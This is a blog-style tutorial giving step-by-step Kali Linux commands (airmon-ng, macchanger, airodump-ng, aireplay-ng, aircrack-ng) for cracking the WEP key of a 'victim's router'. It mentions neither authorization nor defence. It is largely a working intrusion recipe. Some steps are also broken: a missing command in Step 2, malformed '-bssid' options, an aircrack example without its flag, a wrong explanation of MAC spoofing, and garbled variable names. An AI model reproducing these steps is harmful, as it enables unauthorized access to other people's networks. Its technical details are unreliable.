For this tutorial you need external WiFi adapter or have Kali installed in your Hard Drive, not a virtual machine. Otherwise, look for the method using normal windows OS in the intermediate section

Start up Kali, Login and then follow the below steps

Step 1: Open console and type the following to start up network connections.

/etc/init.d/networking start

Step 2: Now we are going to put the network card into moniter mode by typing the following.


(You will find your Interface here)

Step 3: So first start up the scan

airmon-ng start wlan0


airmon-ng start wlan1

(this command depends on what it reads on your router or networking card as, replace as needed)

Step 4: Lets spoof your MAC address first by typing this next command.

ifconfig wlan1 down

macchanger -r wlan1

ifconfig wlan1 up

This will change the MAC address being used to the computer we are connecting to.

Step 5: Time to start finding our victim’s router, type the following in console.

airodump-ng mon0

This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:

Step 6: Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new console: (Read carefully!)

airodump-ng -c [channel number] -bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)

For Example:

airodump-ng -c 1 -bssid 11:22:33:44:55:66 -w Newcapfile mon0

(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, ‘mon0’ or ‘mon1’ based on your adapter, and for name of cap file you can type in any file name like ‘MyCapFile’)

Step 7: Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new console and type:

aireplay-ng -1 1 -a [The BSSID of the router] mon0

For example:

aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0

Step 8: Almost done, we just need to contune the capturing process, open another console and type:

aireplay-ng -3 -b [The BSSID of the router] mon0

Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)

Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you’ve captured enough packets, type CTRL + C to stop the process and continue to step 9.

Step 9: Time to start cracking that cap file 😀 You can think of it like every single packet contains a bit of leaked password. So we’ve captured a large number of packets, compiled them in the .cap file and now we’re going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new console and type:

aircrack-ng -b \[bssid\] \[file name\]-01.cap

For example:

 aircrack-ng 11:22:33:44:55:66 wepcap-01.cap

Step 10: Wait a few seconds and we should now be presented with the key to log in to the router.

Key Commands.

nwlan0 = Interface (Examples: wlan0, ath0, eth0)

nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter’s interface)

nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

nssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-\*.xor= The \* being replaced by a number

(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Got any questions? Come, let's talk on twitter :)

Tell me that I made the right decision by making this website completely free and without any ads or paywalls by supporting me on Patreon.

go to top